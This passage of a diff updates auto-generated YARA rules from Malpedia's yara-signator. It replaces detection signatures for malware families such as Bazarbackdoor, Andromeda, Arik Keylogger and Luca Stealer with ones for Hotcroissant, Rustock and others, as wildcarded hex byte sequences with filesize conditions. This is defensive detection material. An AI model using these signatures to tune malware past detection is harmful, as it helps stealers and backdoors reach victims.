+		$sequence_1 = { 8b5608 8d0417 3b4604 761d c1e80a 40 c1e00a }
+		$sequence_2 = { 752e 8b45b8 8b483c 894df8 }
+		$sequence_3 = { 0fbe07 83c099 46 83f811 7713 }
+		$sequence_4 = { 51 52 50 68???????? b9ff0f0000 }
+		$sequence_5 = { 6a00 50 e8???????? 83c40c 33c0 33c9 8d542408 }
+		$sequence_6 = { 83c440 8d942460030000 52 68???????? b923010000 e8???????? }
+		$sequence_7 = { 8b442428 8bce e8???????? 56 55 ffd3 }
+		$sequence_8 = { 8b35???????? 33c0 6801040000 89442418 89442414 8944241c }
+		$sequence_9 = { 68???????? e8???????? b8???????? 83c430 8d5002 }
 
 	condition:
-		7 of them and filesize < 373760
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE
+rule MALPEDIA_Win_Hotcroissant_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a043fe1e-731d-5a9e-9fb9-7f9cee445985"
+		id = "041c170b-cb82-5079-a120-00d45f6cb95f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bazarbackdoor_auto.yar#L1-L596"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hotcroissant_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "fa8de6b24d77371b268d10b4378b94df76c1989be3511c0a0f6cfa11ec9c195b"
+		logic_hash = "9f9dd22a171d10237a5cfe7e750b40557b2e5ee36c0e5da30f363ab0cd99d478"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -86347,96 +86607,34 @@ rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 780a 4898 }
-		$sequence_1 = { 41b80f100000 488bce 4889442420 ff15???????? }
-		$sequence_2 = { e8???????? 4885c0 740a 488bcf ffd0 }
-		$sequence_3 = { 488d4d80 e8???????? 498bd6 488d4d80 }
-		$sequence_4 = { 0fb70f ff15???????? 0fb74f02 0fb7d8 }
-		$sequence_5 = { 0fb74f02 0fb7d8 ff15???????? 0fb74f08 }
-		$sequence_6 = { 7507 33c0 e9???????? b8ff000000 }
-		$sequence_7 = { ff15???????? 0fb74f08 440fb7e8 ff15???????? }
-		$sequence_8 = { c3 0fb74c0818 b80b010000 663bc8 }
-		$sequence_9 = { cc e8???????? cc 4053 4883ec20 b902000000 }
-		$sequence_10 = { 4885c9 7406 488b11 ff5210 ff15???????? }
-		$sequence_11 = { e8???????? 4c89e1 e8???????? 8b05???????? }
-		$sequence_12 = { 4889f1 e8???????? 8b05???????? 8b0d???????? }
-		$sequence_13 = { 48c1e108 4803c8 8bc1 488d94059f070000 }
-		$sequence_14 = { ff15???????? ff15???????? 4d8bc5 33d2 }
-		$sequence_15 = { e8???????? 4889c7 8b05???????? 8b0d???????? }
-		$sequence_16 = { 31ff 4889c1 31d2 4989f0 }
-		$sequence_17 = { ff15???????? 4889c1 31d2 4d89e0 }
-		$sequence_18 = { 488d95a0070000 488d442470 41b80f100000 488bce }
-		$sequence_19 = { 4c89742440 4c89742438 4489742430 4c89742428 }
-		$sequence_20 = { 418d5508 488bc8 ff15???????? 488bd8 4885c0 }
-		$sequence_21 = { 488d9590050000 488bce ff15???????? 85c0 }
-		$sequence_22 = { 4533c9 4889442428 488d95a0070000 488d442470 }
-		$sequence_23 = { 4889c1 31d2 4989f8 41ffd6 }
-		$sequence_24 = { 488bd3 e8???????? ff15???????? 4c8bc3 33d2 488bc8 }
-		$sequence_25 = { 85c8 0f94c0 833d????????0a 0f9cc1 84c1 7508 30c1 }
-		$sequence_26 = { c744242800000001 4533c9 4533c0 c744242002000000 }
-		$sequence_27 = { c744242880000000 c744242003000000 4889f9 ba00000080 41b801000000 }
-		$sequence_28 = { 0fb65305 33c0 80f973 0f94c0 }
-		$sequence_29 = { 08c1 80f101 7502 ebfe }
-		$sequence_30 = { 08ca 80f201 7502 ebfe }
-		$sequence_31 = { 0f9fc1 38d3 7507 08c1 80f101 744d }
-		$sequence_32 = { 89d1 83f1fe 85d1 0f95c2 833d????????09 0f9fc1 89cb }
-		$sequence_33 = { ff15???????? 488bf8 4885c0 7533 }
-		$sequence_34 = { 89c1 83f1fe 85c1 0f94c0 }
-		$sequence_35 = { 89d1 83f1fe 85d1 0f94c2 833d????????0a 0f9cc1 89cb }
-		$sequence_36 = { ff15???????? 31ed 4889c1 31d2 }
-		$sequence_37 = { 0fb64b04 0fb6d1 80f973 7504 0fb65305 33c0 }
-		$sequence_38 = { 0f9fc1 83fa0a 0f9cc2 30da 7512 08c1 80f101 }
-		$sequence_39 = { 4889c1 31d2 4989e8 ff15???????? }
-		$sequence_40 = { 4889c1 31d2 4d89f8 ffd3 }
-		$sequence_41 = { e8???????? 4c897c2420 4889d9 89fa }
-		$sequence_42 = { 7405 80fa2e 750f 0fb6c1 }
-		$sequence_43 = { 488d4c2428 e8???????? 4889f1 4889c2 }
-		$sequence_44 = { c744242880000000 c744242003000000 4889f1 ba00000080 }
-		$sequence_45 = { 4889fa 4189f0 4d89f1 ffd0 }
-		$sequence_46 = { 6689442470 8d4833 ff15???????? c744242810000000 }
-		$sequence_47 = { 33d2 6a09 68fe6a7a69 42 e8???????? }
-		$sequence_48 = { 7506 8b0e 894c2460 0fb7c0 }
-		$sequence_49 = { 7512 83fe40 730d 896c846c 8b742468 46 }
-		$sequence_50 = { 0fb745e8 50 68???????? e8???????? }
-		$sequence_51 = { 50 e8???????? 83c404 33c0 33d2 40 8bc8 }
-		$sequence_52 = { 66890d???????? 0fb7ca ff15???????? b901000000 66c746020100 }
-		$sequence_53 = { 75ef 21542440 6890010000 686a72995d 6a04 }
-		$sequence_54 = { 51 8bd6 e8???????? 59 59 85c0 }
-		$sequence_55 = { 33ff 32db 885c2410 c70601000000 eb35 81ffff030000 }
-		$sequence_56 = { 6a01 6a04 68???????? ff15???????? 8bf8 83ffff }
-		$sequence_57 = { 81feff030000 733c 8a02 3cc0 721e }
-		$sequence_58 = { 88041a 8bd1 41 3bcf }
-		$sequence_59 = { 0fb6c9 51 8bca c1f910 0fb6c1 50 8bc2 }
-		$sequence_60 = { 2ac2 fec8 88041a 8bd1 }
-		$sequence_61 = { 3cc0 721e 0fb6c8 0fb64201 }
-		$sequence_62 = { 8d7001 8d4610 50 6a08 }
-		$sequence_63 = { 0fb70d???????? 83c40c 8d4101 51 66a3???????? }
-		$sequence_64 = { 89442438 4863442430 486bc010 488d0de3380200 4803c8 488bc1 }
-		$sequence_65 = { 7460 488b442430 488b00 8b4028 488b4c2440 4803c8 488bc1 }
-		$sequence_66 = { 4c8d052a200000 488b542428 488d4c2420 e8???????? 4889442430 ff542430 }
-		$sequence_67 = { 48894c2408 4883ec48 8b442458 89442424 48c744242800000000 41b800100200 }
-		$sequence_68 = { 0f848c000000 488b442430 83782000 7460 488b442430 }
-		$sequence_69 = { 4533c0 ba01000000 488b4c2440 ff9424a0000000 89842480000000 }
-		$sequence_70 = { 488b442430 488b00 83782800 0f848c000000 488b442430 }
-		$sequence_71 = { 488d0de3380200 4803c8 488bc1 48634c2434 488d04c8 48634c2438 8b0488 }
+		$sequence_0 = { 85c0 7409 6a01 50 ff15???????? 68???????? }
+		$sequence_1 = { 68703a0000 8d958cc5ffff 52 50 }
+		$sequence_2 = { 33c0 52 a3???????? a3???????? a3???????? a3???????? }
+		$sequence_3 = { 33ff 3bc7 7473 56 }
+		$sequence_4 = { 7409 6a01 50 ff15???????? 68???????? }
+		$sequence_5 = { c1e808 46 0bc7 8955fc 3b750c }
+		$sequence_6 = { 8b7d08 8a1c3e 32da 32d8 32d9 881c3e 8ad8 }
+		$sequence_7 = { 7473 56 6a01 50 }
+		$sequence_8 = { a3???????? a3???????? ffd6 a1???????? 50 ffd6 }
+		$sequence_9 = { a3???????? a3???????? a3???????? ffd6 a1???????? 50 }
 
 	condition:
-		7 of them and filesize < 2088960
+		7 of them and filesize < 591872
 }
-rule MALPEDIA_Win_Andromeda_Auto : FILE
+rule MALPEDIA_Win_Hi_Zor_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1eaf3713-eaf3-56ba-93e1-406275c53353"
+		id = "24f4aee1-0c12-5135-acc3-79b59762efbf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.andromeda_auto.yar#L1-L304"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hi_zor_rat_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "9e39961b4372e3bc922b40be7e1f53c18cfcecc85e79e89fe6975047795ee278"
+		logic_hash = "8af52d284dd3ab5b7dd25e47f9e41f3a65d45bdcdc9d0dd1ec6d75ccfe311424"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -86448,91 +86646,71 @@ rule MALPEDIA_Win_Andromeda_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebcf 33c0 33db 33c9 33d2 }
-		$sequence_1 = { 368a942800ffffff 02da 368ab42b00ffffff 3688b42800ffffff }
-		$sequence_2 = { fc 33c0 8b7508 33db 368a942900ffffff 02c2 }
-		$sequence_3 = { 3688b42800ffffff 3688942b00ffffff 02d6 81e2ff000000 }
-		$sequence_4 = { 41 3b4d14 75c3 61 }
-		$sequence_5 = { 8d7dfc b8fcfdfeff fd ab 2d04040404 e2f8 fc }
-		$sequence_6 = { 368a942900ffffff 02c2 020433 368ab42800ffffff 3688b42900ffffff 3688942800ffffff fec1 }
-		$sequence_7 = { 81c400ffffff 60 b940000000 8d7dfc b8fcfdfeff fd }
-		$sequence_8 = { 60 e8???????? 5d 81ed???????? 33c9 }
-		$sequence_9 = { 50 e8???????? 83c40c 6800000100 e8???????? }
-		$sequence_10 = { 85ca 7404 0420 8806 }
-		$sequence_11 = { 0f9ec1 33d2 3c41 0f9dc2 85ca 7404 }
-		$sequence_12 = { 8a06 33c9 3c5a 0f9ec1 33d2 }
-		$sequence_13 = { 0fb64601 84c0 7905 0d00ffffff }
-		$sequence_14 = { 6a30 8d45d0 50 6a01 ff7508 }
-		$sequence_15 = { 56 6800010400 56 56 56 ff750c }
-		$sequence_16 = { e8???????? 8945fc 83f800 0f8476010000 6804010000 6a00 }
-		$sequence_17 = { ff35???????? e8???????? 8945f8 83f800 0f8458010000 6804010000 ff75f8 }
-		$sequence_18 = { f3aa 6a00 6a00 ff75f0 e8???????? c7459c44000000 }
-		$sequence_19 = { a3???????? 6804010000 6a00 ff35???????? e8???????? }
-		$sequence_20 = { 68???????? 6801000080 e8???????? 83f800 }
-		$sequence_21 = { ff75fc 6a00 e8???????? 6a00 ff75f8 ff75fc e8???????? }
-		$sequence_22 = { e8???????? 6a06 ff75f8 e8???????? 8d45f4 50 }
-		$sequence_23 = { 83f8ff 7457 33c0 8d7d9c }
-		$sequence_24 = { 8b45ec 8b55fc 8b0490 81f683073af8 81e7d889e666 8945f8 }
-		$sequence_25 = { 81fe50f639e3 0f84a2f7ffff 81455886080000 69ffc520db89 ff5518 }
-		$sequence_26 = { 69f676ce078f 81ef4b9d0e76 81ff901d63a9 0f84f1010000 8b4544 }
-		$sequence_27 = { 0f856afeffff e9???????? 55 8bec 83ec24 53 56 }
-		$sequence_28 = { 8bd8 ff5630 8bf8 ff560c 23d8 ff5638 }
-		$sequence_29 = { 69ffbb3de4b4 d1e8 81f679b291d1 894544 3d80000000 7363 }
-		$sequence_30 = { 03c1 8b4df0 0fb609 03ca 81e1ff000000 }
-		$sequence_31 = { 8b456c 8b4018 894560 81c3b6dd7f19 ff5634 0faff8 }
+		$sequence_0 = { 8b8b40010000 57 8d55f0 52 8d8594f6ffff 50 }
+		$sequence_1 = { 8945f8 8945fc ff15???????? 33c9 83c404 }
+		$sequence_2 = { 8b7818 03705c c1e30e 8db43e515a5e26 }
+		$sequence_3 = { 897df8 0b75f8 0bdf 337014 335814 03f2 }
+		$sequence_4 = { 23df 0bde 03585c 8975fc 8b7018 }
+		$sequence_5 = { f3a5 66a5 682c010000 8d4320 }
+		$sequence_6 = { 8d45fc 50 6a06 68???????? 52 c745fc00000000 ff15???????? }
+		$sequence_7 = { 33c0 6683b44568ffffff0d 40 83f844 }
+		$sequence_8 = { 81c756b7c7e8 c1ef14 c1e30c 0bdf 897010 03f3 }
+		$sequence_9 = { c7458424003300 c7458838002200 c7458c00003300 c7459024002500 c745943f003900 c7459838000a00 c7459c04002300 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Hunter_Auto : FILE
+rule MALPEDIA_Win_Unidentified_061_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "114c619e-d3db-54d7-bef7-7645d901bc94"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hunter_auto.yar#L1-L90"
+		id = "59888b60-a3e6-5e9f-a441-429646fe0731"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_061_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "776a5d8eb049aeb15b1138e40f903b0e7294cf0475240df008d707aa37c36610"
+		logic_hash = "ee3ce5b6c77f09c690f7a934c26be09c58c4fcdee70275b61c00e527d8aa097d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0000 9c 35a035a435 a835 }
-		$sequence_1 = { 0145f4 8d45b4 8b55f0 8b4de4 }
-		$sequence_2 = { 01442428 59 11742428 85db }
-		$sequence_3 = { 0145e8 8d838e000000 3bc2 8b45e8 }
-		$sequence_4 = { 01442444 53 11542444 51 }
-		$sequence_5 = { 0103 115304 e9???????? 8b4c241c }
-		$sequence_6 = { 014140 89413c 899604010000 e9???????? }
-		$sequence_7 = { 00443907 8a043a 88043b 8a443a01 }
+		$sequence_0 = { 8d85d4fdffff 50 e8???????? c9 }
+		$sequence_1 = { 89b5f0fdffff 899decfdffff 89b5f4feffff 899df0feffff ff15???????? 8945fc }
+		$sequence_2 = { 51 8365fc00 8d45fc 50 68???????? 6801000080 ff15???????? }
+		$sequence_3 = { 8945f0 0fb705???????? 50 ff15???????? 668945ee }
+		$sequence_4 = { 68???????? 56 ff15???????? 83c41c 8d4601 5e eb09 }
+		$sequence_5 = { 7417 03f3 3bf7 7ccb eb2f 7d29 }
+		$sequence_6 = { 83cfff c6457300 3b7566 7cb5 3b7566 }
+		$sequence_7 = { 53 57 6a04 33ff 33db }
+		$sequence_8 = { 5b c9 c20800 81ec00040000 68???????? 68???????? ff15???????? }
+		$sequence_9 = { eb04 c645fb3d 6a05 8d45f8 50 ff750c c645fc00 }
 
 	condition:
-		7 of them and filesize < 1056768
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Grillmark_Auto : FILE
+rule MALPEDIA_Win_Waterspout_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f964c2f0-0000-5336-8c75-c1988fed5207"
+		id = "312b289d-c89a-504c-8e5c-23fd2356f776"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grillmark_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.waterspout_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3b34499d4c29c52da57dd97a7dde84f3954319d72fae7b0456cb1c1378f5429f"
+		logic_hash = "ca34650795bef65f517e7b6e56e86508cb7b6332fa50178472230b7d745dfa16"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86546,32 +86724,32 @@ rule MALPEDIA_Win_Grillmark_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 50 68???????? ff35???????? 56 e8???????? 68???????? }
-		$sequence_1 = { 40 83c104 ebf5 5d c3 55 8bec }
-		$sequence_2 = { e8???????? a3???????? ff35???????? 8d85e4fdffff 68???????? 50 e8???????? }
-		$sequence_3 = { 50 ffb604010000 56 e8???????? }
-		$sequence_4 = { e8???????? 59 85c0 59 0f85a4000000 682c020000 6a40 }
-		$sequence_5 = { 56 ff750c e8???????? 83c40c 6a01 5b }
-		$sequence_6 = { 59 75f2 ff7508 eb03 ff75f4 e8???????? 59 }
-		$sequence_7 = { 7439 48 7579 68???????? }
-		$sequence_8 = { 7405 83f86f 7532 ff75fc e8???????? 8bf0 59 }
-		$sequence_9 = { 802600 5f 8908 8b45f8 5e }
+		$sequence_0 = { ff15???????? 3bf3 0f8481000000 8d4c2418 8d54240c 51 53 }
+		$sequence_1 = { 61 8b4508 48 894508 7596 5f 5e }
+		$sequence_2 = { 68???????? 6a64 e8???????? 83c408 8b0d???????? 8d44242c }
+		$sequence_3 = { 53 8b5c240c 56 8b74240c 3bf3 7414 }
+		$sequence_4 = { f2ae f7d1 49 83f931 7607 }
+		$sequence_5 = { 5b c3 8b54241c 8b35???????? 3bdf }
+		$sequence_6 = { 89442428 c1f808 88442413 8b02 2b44241c 83f801 7706 }
+		$sequence_7 = { b8f41f0000 e8???????? 53 55 }
+		$sequence_8 = { 8844240e 8844240f 8d442400 50 8b442418 }
+		$sequence_9 = { 8d7c241c 6804010000 f3ab b9fc070000 8dbc24a0230000 f3ab }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Ironwind_Auto : FILE
+rule MALPEDIA_Win_Rustock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7b3278a-33a9-59fb-98d9-d012cae38570"
+		id = "2ee0956c-f0f1-5810-b10e-703861aef3b0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironwind"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ironwind_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rustock_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "df52b853e06a9bac2fed032f09d4a195b27f234efb72e316b71f02accfc6c4ed"
+		logic_hash = "3641dcae675b230edb174a50f5ec564e4adb4fc1e74afa68371b58ccaf9cdb5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86585,32 +86763,32 @@ rule MALPEDIA_Win_Ironwind_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d3926 7425 4c396718 751f 4c396720 7519 498b8f90110000 }
-		$sequence_1 = { c7459401000000 498b5620 e8???????? 4c8d45b8 488bce 488d15fd5c0300 e8???????? }
-		$sequence_2 = { 498b4c3608 49892c36 ff15???????? 49896c3608 488bb3c80c0000 488bc6 48ffc7 }
-		$sequence_3 = { 0f8582010000 48837f4800 7568 488b6f08 4885ed 744a 48635f10 }
-		$sequence_4 = { 488bce e8???????? b80f000000 e9???????? 4438a7db020000 418bc4 41b801000000 }
-		$sequence_5 = { 488d15613e0500 e8???????? 488bf8 418bde 4885c0 0f84ab050000 440fb6bd08200000 }
-		$sequence_6 = { 488d159df20300 488bcb e8???????? 4885c0 752b 448d4810 488bd6 }
-		$sequence_7 = { 4c8bc0 488d15ad180200 488bcd e8???????? 899d540d0000 c70637000000 48635720 }
-		$sequence_8 = { e9???????? 498b00 4885c0 790a b82b000000 e9???????? 48898120030000 }
-		$sequence_9 = { 410f94c7 4489bde0000000 4d8b4cc1f8 e8???????? 8bf8 85c0 0f85fffeffff }
+		$sequence_0 = { 6a00 8d85f8fdffff 50 ff15???????? 6a01 8d85fcfeffff 50 }
+		$sequence_1 = { 8901 eb03 8b5dbc 837de000 }
+		$sequence_2 = { 897de4 eb10 837ddcff 740a }
+		$sequence_3 = { 29f8 83cbff f7d3 b8670e0100 8d0dc8680100 01d0 }
+		$sequence_4 = { 83c404 8b1c24 83c404 5e }
+		$sequence_5 = { 7404 33c0 40 c3 33c0 c3 6a34 }
+		$sequence_6 = { 85c9 7506 68db030100 c3 ff15???????? }
+		$sequence_7 = { 770d 57 e8???????? 8bd0 85d2 59 }
+		$sequence_8 = { 80a04031040100 40 3bc6 72be 5e }
+		$sequence_9 = { 8975c0 85f6 0f848b000000 8365fc00 83c003 83e0fc e8???????? }
 
 	condition:
-		7 of them and filesize < 995328
+		7 of them and filesize < 565248
 }
-rule MALPEDIA_Win_Tinytyphon_Auto : FILE
+rule MALPEDIA_Win_Cherry_Picker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b03e241-fb6f-559b-bde6-deb493402fa5"
+		id = "85645a18-926d-5b0e-9fa0-dbb70398619f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinytyphon_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cherry_picker_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "f9788ed24c5ff9be6cbd5ec91e29693ea290ace26342cc375a5a9e76cbe49f63"
+		logic_hash = "d063fae0bccc43dbf0d60b6c18c60c6de12439bcf31003957c363036cbe5a98f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86624,32 +86802,32 @@ rule MALPEDIA_Win_Tinytyphon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? ebea 6a00 6a00 8d95f8feffff }
-		$sequence_1 = { 8955f0 8d45d8 50 ff15???????? 8945d0 8b4df0 3b4dd0 }
-		$sequence_2 = { 034160 8b55dc 8d8402bbd2d72a 8945dc }
-		$sequence_3 = { 6a13 8b85e8feffff 50 ff15???????? 85c0 7544 }
-		$sequence_4 = { c1e108 0bd1 8b45f4 0fb6480e c1e110 0bd1 8b45f4 }
-		$sequence_5 = { 668955fc 33c0 668945fc eb0c 668b4dfc 6683c101 66894dfc }
-		$sequence_6 = { 8b5508 034a78 8b45e0 8d8c0881f67187 894de0 8b55e0 }
-		$sequence_7 = { 034160 8b55e4 8d84026556acc4 8945e4 8b4de4 c1e117 8b55e4 }
-		$sequence_8 = { 034de4 894df8 8b55f4 0fb64204 8b4df4 0fb65105 c1e208 }
-		$sequence_9 = { 8b4de4 c1e116 8b55e4 c1ea0a 0bca 894de4 8b45e4 }
+		$sequence_0 = { 83c8ff 56 90 8bf0 0fbec9 81e6ff000000 }
+		$sequence_1 = { 68???????? 68???????? a3???????? ffd6 68???????? 6a3c }
+		$sequence_2 = { 69c0e8030000 68???????? 6a01 68???????? 68???????? a3???????? }
+		$sequence_3 = { 52 8d442428 50 ff542420 }
+		$sequence_4 = { 41 84d2 75f6 8b3d???????? }
+		$sequence_5 = { 7512 68???????? 50 50 ff15???????? a3???????? }
+		$sequence_6 = { a1???????? 56 6aff 50 8bf1 }
+		$sequence_7 = { 83c408 2bf2 8a11 88140e 41 84d2 }
+		$sequence_8 = { 8a0d???????? ba???????? 83c8ff 56 }
+		$sequence_9 = { 6aff 50 ffd3 6a00 6a00 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 712704
 }
-rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE
+rule MALPEDIA_Win_Final1Stspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7cfe77b9-498e-52b0-a1e5-e481078fb2b8"
+		id = "06e7f902-9031-5e75-88f0-dd09807b7f4e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.arik_keylogger_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.final1stspy_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "efa31a5efe80de4c661e6c1fa566389f67f3059a66f1ad3d5cfcbb40b493c756"
+		logic_hash = "2aee3f29893f78ed34587724b374d747687bfd3ae50997bd5da3ecf9af5640fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86663,32 +86841,32 @@ rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8064040000 85c0 7468 8b45fc 8b8064040000 e8???????? 89c3 }
-		$sequence_1 = { ff4008 8b45fc ff40f0 e8???????? 8d45c0 e8???????? c745c000000000 }
-		$sequence_2 = { 8d85fcfdffff 89da e8???????? 85c0 750c c745fc12000000 e9???????? }
-		$sequence_3 = { 8d9574ffffff b801000000 e8???????? e8???????? 50 85c0 0f8576010000 }
-		$sequence_4 = { ff75f0 a1???????? ffd0 8b45f4 83c060 b100 ba10000000 }
-		$sequence_5 = { c3 55 89e5 83ec04 a1???????? 8945fc 8b45fc }
-		$sequence_6 = { c745f800000000 58 85c0 7405 e8???????? 8b5dc8 8b75cc }
-		$sequence_7 = { 8b85b8feffff 8945f0 e8???????? 89c3 8d55e8 89d8 8b0b }
-		$sequence_8 = { 8b8064040000 8945f4 8b45fc 8b407c 85c0 7434 814df800000200 }
-		$sequence_9 = { eb60 8b45fc 8b40fc 8b4060 ff30 8b45fc 8b40fc }
+		$sequence_0 = { 8a7201 8ad3 3ad6 7412 8a5101 41 84d2 }
+		$sequence_1 = { 46 8a1d???????? 83ff02 7d0e 8bc2 }
+		$sequence_2 = { 5d c3 2d???????? 78dc }
+		$sequence_3 = { 881439 41 3bce 7cef 8bc7 }
+		$sequence_4 = { 84db 75f4 5f 5e 83c8ff 5b 8be5 }
+		$sequence_5 = { 8bc8 83c404 894df8 8bf1 8b4dfc 803900 7426 }
+		$sequence_6 = { bf01000000 eb2b b8???????? 8acb }
+		$sequence_7 = { 3bf7 7cf6 8b3d???????? 66660f1f840000000000 }
+		$sequence_8 = { 6690 3acd 7412 8a4801 40 84c9 }
+		$sequence_9 = { 7d11 8a1439 80c27a 80f219 881439 41 }
 
 	condition:
-		7 of them and filesize < 4947968
+		7 of them and filesize < 557056
 }
-rule MALPEDIA_Win_Luca_Stealer_Auto : FILE
+rule MALPEDIA_Elf_Nosedive_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "719beb67-5539-58f6-b79d-9238d1f007ac"
+		id = "455c512f-a4d2-5592-873b-6a0f8d7aa60b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.luca_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nosedive"
